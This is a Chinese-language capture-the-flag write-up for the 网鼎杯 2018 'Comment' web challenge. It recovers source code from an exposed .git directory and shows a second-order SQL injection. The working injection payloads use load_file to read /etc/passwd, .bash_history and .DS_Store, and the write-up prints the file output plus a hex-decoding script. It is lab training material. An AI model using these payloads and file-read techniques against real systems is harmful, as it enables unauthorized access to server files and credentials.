[网鼎杯 2018]Comment
尝试发帖时被要求登陆
一时竟没想到是猜密码
username: zhangwei
password: zhangwei666
/comment.php?id=1
获取源码
扫描目录
存在git泄露
被骗了.jpg
然后发现一个功能更强大一点的githacker
githacker --url http://99171b24-38c9-4bf6-ae83-d4cecaa108ef.node4.buuoj.cn:81/.git/ --output-folder result --delay 0.1 --threads 1
git log --reflog
可以看出进行过版本回退
git reset --hard e5b2a
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
header("Location: ./login.php");
die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
$category = addslashes($_POST['category']);
$title = addslashes($_POST['title']);
$content = addslashes($_POST['content']);
$sql = "insert into board
set category = '$category',
title = '$title',
content = '$content'";
$result = mysql_query($sql);
header("Location: ./index.php");
break;
case 'comment':
$bo_id = addslashes($_POST['bo_id']);
$sql = "select category from board where id='$bo_id'";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
if($num>0){
$category = mysql_fetch_array($result)['category'];
$content = addslashes($_POST['content']);
$sql = "insert into comment
set category = '$category',
content = '$content',
bo_id = '$bo_id'";
$result = mysql_query($sql);
}
header("Location: ./comment.php?id=$bo_id");
break;
default:
header("Location: ./index.php");
}
}
else{
header("Location: ./index.php");
}
?>
在write操作中,所有的POST参数都经过了addslashes的转义,而在comment操作中,category却没有进行addslashes转义,这就给二次注入创造了机会
文件读取
综合利用单行和多行注释使查询合法
title=ttt&content=ccc&category=',content=load_file('/etc/passwd')/*
这时发表评论内容
content=*/,#
注入的结果是这样
insert into comment
set category = '',content=load_file('/etc/passwd')/*',
content = '*/,#',
bo_id = '$bo_id'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/var/lib/mysql:/bin/false
www:x:500:500:www:/home/www:/bin/bash
不寻常的一点是,用户www就像普通用户一样拥有/home下的家目录
而且通常非登录用户的登录shell都设为nologin以防止其登录,而www的登录shell却被设置为bash,此事必有蹊跷
读取/home/www/.bash_history
cd /tmp/
unzip html.zip
rm -f html.zip
cp -r html /var/www/
cd /var/www/html/
rm -f .DS_Store
service apache2 start
- 在
/tmp下解压了html.zip - 删除压缩包
- 将解压出来的
html文件夹递归复制到/var/www下 - 删除
/var/www/html/.DS_Store - 启动服务器
删了,但没完全删掉.jpg
读取/tmp/html/.DS_Store
对于二进制文件,采用十六进制编码输出
hex(load_file('/tmp/html/.DS_Store'))
s = 'xxxxxx'
f = open('.DS_Store','w')
for i in range(len(s) // 2):
ss = s[2 * i: 2 * i + 2]
f.write(chr(int(ss, base=16)))
读取/tmp/html/flag_8946e1ff1ee3e40f.php
然后发现这个flag是假的QAQ
真正的flag在/var/www/html/下
